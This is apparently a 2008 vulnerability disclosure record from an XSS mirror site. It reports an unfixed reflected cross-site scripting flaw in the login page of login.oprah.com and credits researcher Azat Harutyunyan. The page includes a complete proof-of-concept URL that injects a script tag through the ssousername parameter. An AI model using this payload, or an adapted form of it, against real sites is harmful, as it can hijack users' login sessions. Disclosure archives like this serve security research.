Security researcher Azat Harutyunyan, has submitted on 26/05/2008 a cross-site-scripting (XSS) vulnerability affecting login.oprah.com, which at the time of submission ranked 1699 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 26/05/2008 |
Date published: 27/05/2008 |
Fixed? Mail us! | Status:  UNFIXED |
URL: https://login.oprah.com/sso/jsp/login_ocom.jsp?site2pstoretoken=v1.4~D35113C4~D5F231DA5B063862816B0D
9FC06F6FA596F2F4BF65AFA1DA6A1F5334A2805FE973B99E81C4C72FBB8CD920B8B7F5C57B343691EE9EA6C6409159E5EC1E
48D81A6AFE9F88724D7F740BBD2D9D8A03C72BD44462AA7C5C4775AABF8F7444C2238E14CA428062EC2A54E798B60E0F9BC2
A82DB00520B8F32C1C93A69A0940A40AC012993E2AFBEF5CAA91F6052DB92C626D1DB39AEB831E44EA3ED3404DFC33B2ADC3
EA8994EB485624937A9BE7864F2B5B585C7AC60F9ACDE608A3645F3E54B41B82DFC61638DACC63073039CDC613A125&p_err
or_code=&p_submit_url=https%3A%2F%2Flogin.oprah.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fwww.oprah
.com&ssousername="<<script>alert("XSSED BY AZAT")</script> |
|
Click here to view the mirror
|
|
|
| 
